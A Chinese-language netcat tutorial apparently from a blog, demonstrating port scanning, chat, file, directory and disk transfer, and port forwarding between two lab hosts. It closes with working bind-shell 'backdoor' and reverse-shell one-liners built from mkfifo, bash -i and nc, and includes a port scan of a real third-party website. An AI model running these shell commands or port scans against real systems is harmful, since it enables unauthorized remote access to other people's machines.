netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。
netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。
netcat 官网
http://netcat.sourceforge.net/
nc经常用来调试网络程序,
其实这个小工具结合创意能玩出你意想不到的功能!
本文演示netcat以下教程:
<<目录>> 实验环境介绍 端口扫描 网络调试,测试远程方网络程序 远程聊天, TCP模式 远程聊天, UDP模式 观察模式:禁止从标准输入中读取数据 超时自动断开连接 始终保持启动状态 模拟HTTP客户端 连接百度 文件传输 二进制文件传输 目录传输 流媒体视频 传输 克隆一个设备 端口转发 系统后门 反向shell
实验环境介绍:
两台Linux主机,同一个局域网内 Server: IP 11.11.11.7 OS:Ubuntu14.04 [email protected]:~$ sudo apt-get install netcat Client: IP 11.11.11.4 OS:CentOS-6.5 [[email protected] ~]$ yum install nc
先看看Linux下netcat 与 nc 的关系
[email protected]:~$ which netcat /bin/netcat [email protected]:~$ which nc /bin/nc [email protected]:~$ md5sum /bin/netcat 562d2661804f6ad900827bbfeb8c6350 /bin/netcat [email protected]:~$ md5sum /bin/nc 562d2661804f6ad900827bbfeb8c6350 /bin/nc [email protected]:~$ 结果:netcat与nc是同一个程序!
nc的命令
[email protected]:~$ nc This is nc from the netcat-openbsd package. An alternative nc is available in the netcat-traditional package. usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length] [-P proxy_username] [-p source_port] [-q seconds] [-s source] [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
端口扫描
扫描局域网内IP为11.11.11.7主机,从10号到500号所开放的端口 [[email protected] ~]$ nc -z 11.11.11.7 10-500 Connection to 11.11.11.7 22 port [tcp/ssh] succeeded! Connection to 11.11.11.7 80 port [tcp/http] succeeded! [[email protected] ~]$ 扫描本机开放的端口,范围10-500 [[email protected] ~]$ nc -z localhost 10-500 Connection to localhost 22 port [tcp/ssh] succeeded! Connection to localhost 25 port [tcp/smtp] succeeded! Connection to localhost 111 port [tcp/sunrpc] succeeded! [[email protected] ~]$ 参数-z 去掉-z参数,阻塞在发现的端口这里,发现开放的端口直接连上了 [[email protected] ~]$ nc localhost 10-500 SSH-2.0-OpenSSH_5.3 -v 参数详细显示 [[email protected] ~]$ nc -zv localhost 20-30 nc: connect to localhost port 20 (tcp) failed: Connection refused nc: connect to localhost port 20 (tcp) failed: Connection refused nc: connect to localhost port 21 (tcp) failed: Connection refused nc: connect to localhost port 21 (tcp) failed: Connection refused Connection to localhost 22 port [tcp/ssh] succeeded! nc: connect to localhost port 23 (tcp) failed: Connection refused nc: connect to localhost port 23 (tcp) failed: Connection refused nc: connect to localhost port 24 (tcp) failed: Connection refused nc: connect to localhost port 24 (tcp) failed: Connection refused Connection to localhost 25 port [tcp/smtp] succeeded! nc: connect to localhost port 26 (tcp) failed: Connection refused nc: connect to localhost port 26 (tcp) failed: Connection refused nc: connect to localhost port 27 (tcp) failed: Connection refused nc: connect to localhost port 27 (tcp) failed: Connection refused nc: connect to localhost port 28 (tcp) failed: Connection refused nc: connect to localhost port 28 (tcp) failed: Connection refused nc: connect to localhost port 29 (tcp) failed: Connection refused nc: connect to localhost port 29 (tcp) failed: Connection refused nc: connect to localhost port 30 (tcp) failed: Connection refused nc: connect to localhost port 30 (tcp) failed: Connection refused [[email protected] ~]$ 扫描电影天堂网站开放了多少端口 扫描速度较慢 www.dytt8.net [[email protected] ~]$ nc -z www.dytt8.net 20-32767 Connection to www.dytt8.net 22 port [tcp/ssh] succeeded! Connection to www.dytt8.net 80 port [tcp/http] succeeded! 等了几分钟,就扫了2个端口出来, 果断不给力! netcat扫描端口太慢了, 这个活交给nmap比较合适,10秒完成! [[email protected] ~]$ nmap www.dytt8.net Starting Nmap 5.51 ( http://nmap.org ) at 2017-03-14 06:16 CST Nmap scan report for www.dytt8.net (117.25.129.231) Host is up (0.036s latency). Not shown: 988 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 443/tcp open https 445/tcp filtered microsoft-ds 593/tcp filtered http-rpc-epmap 1068/tcp filtered instl_bootc 1434/tcp filtered ms-sql-m 4444/tcp filtered krb524 6667/tcp filtered irc 31337/tcp filtered Elite
网络调试
tcp监听本地 [[email protected] ~]# nc -l 8080 [[email protected] ~]# nc -l -p 8080 tcp访问远程主机 [[email protected] ~]# nc 192.168.20.166 8080 udp监听本地 [[email protected] ~]# nc -u -l 8080 udp访问远程主机 [[email protected] chatsvr]# nc -u 192.168.20.18 8080
远程聊天, TCP模式
[email protected]:~$ ifconfig eth0 #服务端 eth0 Link encap:以太网 硬件地址 00:0c:29:29:0f:49 inet 地址:11.11.11.7 广播:11.11.11.255 掩码:255.255.255.0 inet6 地址: fe80::20c:29ff:fe29:f49/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 跃点数:1 接收数据包:5996 错误:0 丢弃:0 过载:0 帧数:0 发送数据包:5066 错误:0 丢弃:0 过载:0 载波:0 碰撞:0 发送队列长度:1000 接收字节:4021349 (4.0 MB) 发送字节:439466 (439.4 KB) #服务端开启监听 [email protected]:~$ nc -l 8080 [[email protected] ~]$ ifconfig eth0 #客户端 nc连接到服务器 eth0 Link encap:Ethernet HWaddr 00:0C:29:C7:07:FF inet addr:11.11.11.4 Bcast:11.11.11.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fec7:7ff/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:15849 errors:0 dropped:0 overruns:0 frame:0 TX packets:22615 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4121990 (3.9 MiB) TX bytes:2038587 (1.9 MiB) Interrupt:18 Base address:0x2000 [[email protected] ~]$ nc 11.11.11.7 8080 HelloWorld! -------------------------------------------------- 看看服务器窗口收到了什么 顺便回复一句! shit 狗屎! [email protected]:~$ HelloWorld! shit 狗屎! ----------------------------- 看看客户端窗口 [[email protected] ~]$ HelloWorld! shit 狗屎! 由此以来, 双方就可以互骂了.
远程聊天, UDP模式
[email protected]:~$ nc -u -l 8080 #服务器开启监听 狗屎! fuck! [[email protected] ~]$ nc -u 11.11.11.7 8080 #客户端连接上来 狗屎! fuck! 这样也可以开始对骂了!
超时自动断开连接
一旦客户端连接上来,2秒内没有发数据,就断开连接 如果客户端狂发数据, 连接保持,2秒内没有发新的数据,就断开连接 [email protected]:~$ nc -w 2 -l 9999 fd sf ds [[email protected] ~]$ nc 11.11.11.7 9999 fdsfds fds f ds
始终保持启动状态
#服务端监听 [email protected]:~$ nc -k -l 9999 haha 你好 linux内核源代码中有脏话 #客户端反复断开, 连接! [[email protected] ~]$ nc 11.11.11.7 9999 haha ^C [[email protected] ~]$ [[email protected] ~]$ nc 11.11.11.7 9999 你好 ^C [[email protected] ~]$ nc 11.11.11.7 9999 linux内核源代码中有脏话 ^C [[email protected] ~]$
模拟HTTP客户端 连接百度
输入:GET / HTTP/1.1 回车 [[email protected] ~]$ nc www.baidu.com 80 GET / HTTP/1.1 看看百度HTTP服务器的头部返回 HTTP/1.1 302 Moved Temporarily Date: Mon, 13 Mar 2017 14:37:58 GMT Content-Type: text/html Content-Length: 215 Connection: Keep-Alive Location: http://www.baidu.com/search/error.html Server: BWS/1.1 X-UA-Compatible: IE=Edge,chrome=1 BDPAGETYPE: 3 Set-Cookie: BDSVRTM=0; path=/ 看看百度HTTP服务器的正文返回 <html> <head><title>302 Found</title></head> <body bgcolor="white"> <center><h1>302 Found</h1></center> <hr><center>pr-nginx_1-0-330_BRANCH Branch Time : Mon Feb 27 16:21:40 CST 2017</center> </body> </html>
文件传输
1, 服务器准备发送文本文件 [email protected]:~$ cat /etc/issue Ubuntu 14.04.5 LTS \n \l [email protected]:~$ cat /etc/issue | nc -l 7080 [email protected]:~$ 2, 客户端准备接受文本文件 [[email protected] ~]$ nc 11.11.11.7 7080 > MyFile.txt [[email protected] ~]$ cat MyFile.txt Ubuntu 14.04.5 LTS \n \l [[email protected] ~]$
nc 传输二进制文件, 服务器传给客户端
[email protected]:~$ dd if=/dev/zero bs=1M count=10 of=test.file 记录了10+0 的读入 记录了10+0 的写出 10485760字节(10 MB)已复制,0.0109197 秒,960 MB/秒 [email protected]:~$ md5sum test.file f1c9645dbc14efddc7d8a322685f26eb test.file [email protected]:~$ [email protected]:~$ cat test.file | nc -l 7080 [[email protected] ~]$ nc 11.11.11.7 7080 > MyFile.txt [[email protected] ~]$ md5sum MyFile.txt f1c9645dbc14efddc7d8a322685f26eb MyFile.txt [[email protected] ~]$
nc 传输二进制文件, 客户端传给服务器
[email protected]:~$ nc -l 7080 > haha #监听,等待数据来临 [email protected]:~$ md5sum haha cd573cfaace07e7949bc0c46028904ff haha [[email protected] ~]$ dd if=/dev/zero bs=1G count=1 of=MyFile 1+0 records in 1+0 records out 1073741824 bytes (1.1 GB) copied, 28.1895 s, 38.1 MB/s [[email protected] ~]$ md5sum MyFile cd573cfaace07e7949bc0c46028904ff MyFile [[email protected] ~]$ nc 11.11.11.7 7080 < MyFile #建立连接, 发数据
目录传输,客户端目录传到服务端
服务端与客户端时间最好同步一下! [email protected]:~$ sudo ntpdate cn.pool.ntp.org [[email protected] ~]$ sudo ntpdate cn.pool.ntp.org #客户端目录情况 [[email protected] ~]$ ll .ssh/ total 12 -rw-rw-r--. 1 chunli chunli 8 Mar 14 06:55 Eng.xtt -rw-r--r--. 1 chunli chunli 1175 Mar 12 23:36 known_hosts -rw-rw-r--. 1 chunli chunli 13 Mar 14 06:55 中文.xtt [[email protected] ~]$ #查看文件MD5值 [[email protected] ~]$ find .ssh/ -type f | xargs md5sum cd5e1e13f12927d85bcf7afd3c24e2b3 .ssh/Eng.xtt 630960961f54d096058e703fb7c51841 .ssh/known_hosts 6107f1d69a7d17430d5baa752c63c847 .ssh/中文.xtt #等服务器开始监听后, 客户端开始发送目录 [[email protected] ~]$ tar -c .ssh/ | nc 11.11.11.7 6789 #服务端开始监听,并接受数据 [email protected]:~$ cd /tmp/ [email protected]:/tmp$ ll 总用量 0 [email protected]:/tmp$ nc -l 6789 | tar -x tar: .ssh:时间戳 2017-03-14 06:55:42 是未来的 28010.428611496 秒之后 [email protected]:/tmp$ md5sum .ssh/* cd5e1e13f12927d85bcf7afd3c24e2b3 .ssh/Eng.xtt 630960961f54d096058e703fb7c51841 .ssh/known_hosts 6107f1d69a7d17430d5baa752c63c847 .ssh/中文.xtt 可以看出, 文件传输过程, 并没有损坏!
流媒体视频 传输
#服务端安装 [email protected]:~$ sudo apt-get install mplayer2 [email protected]:~$ nc -l 8090 | mplayer -vo x11 -cache 1024 - #一个字符都不要少! #客户端发来视频 [[email protected] ~]$ nc 11.11.11.7 8090 < 1.wmv
准备开始!
视频 真是一边传 一边播!
克隆一个设备,将硬盘原始数据 通过网络传出去
[email protected]:~$ sudo dd if=/dev/sda | nc -l 8080 [[email protected] ~]$ sudo -s [[email protected] chunli]# nc 11.11.11.7 8080 | dd of=/dev/sda
端口转发
客户端连接服务器12345端口, 服务器将12345端口的数据转发给8000端口 双发互发内容 服务器端: [email protected]:~$ nc -l 8000 #窗口1 监听状态 hahah 你好, nc 端口转发 我是客户端 我是server [email protected]:~$ mkfifo myfif #窗口2 转发状态 [email protected]:~$ cat myfif | nc localhost 8000| nc -l 12345 > myfif #仅仅是转发 #客户端来连接 [[email protected] ~]$ nc 11.11.11.7 12345 hahah 你好, nc 端口转发 我是客户端 我是server
打开远程机shell(系统后门)
假如netcat 不支持-c 或者 -e 参数(openbsd netcat) 我们仍然能够创建远程shell #在服务器上开后门 [email protected]:~$ mkfifo myfif [email protected]:~$ cat myfif | /bin/bash -i 2>&1 |nc -l 8080 >myfif #客户端连接上来,直接就到服务端的Shell了 [[email protected] ~]$ nc 11.11.11.7 8080 [email protected]:~$ ifconfig ifconfig eth0 Link encap:以太网 硬件地址 00:0c:29:29:0f:49 inet 地址:11.11.11.7 广播:11.11.11.255 掩码:255.255.255.0 inet6 地址: fe80::20c:29ff:fe29:f49/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 跃点数:1 接收数据包:185469 错误:0 丢弃:0 过载:0 帧数:0 发送数据包:246469 错误:0 丢弃:0 过载:0 载波:0 碰撞:0 发送队列长度:1000 接收字节:165332900 (165.3 MB) 发送字节:357718332 (357.7 MB) lo Link encap:本地环回 inet 地址:127.0.0.1 掩码:255.0.0.0 inet6 地址: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 跃点数:1 接收数据包:409 错误:0 丢弃:0 过载:0 帧数:0 发送数据包:409 错误:0 丢弃:0 过载:0 载波:0 碰撞:0 发送队列长度:1 接收字节:32719 (32.7 KB) 发送字节:32719 (32.7 KB) [email protected]:~$
反向shell
#服务器开启监听, 客户端自己反向shell, 直接映入眼前! [email protected]:~$ nc -l 8080 [[email protected] ~]$ ifconfig ifconfig eth0 Link encap:Ethernet HWaddr 00:0C:29:C7:07:FF inet addr:11.11.11.4 Bcast:11.11.11.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fec7:7ff/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:370527 errors:0 dropped:0 overruns:0 frame:0 TX packets:147586 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:520873561 (496.7 MiB) TX bytes:99872253 (95.2 MiB) Interrupt:18 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) [[email protected] ~]$ #客户端窗口fifo, 并连接到服务器 [[email protected] ~]$ mkfifo myfif [[email protected] ~]$ cat myfif | /bin/bash -i 2>&1 |nc 11.11.11.7 8080 >myfif
时间: 2024-09-29 09:29:51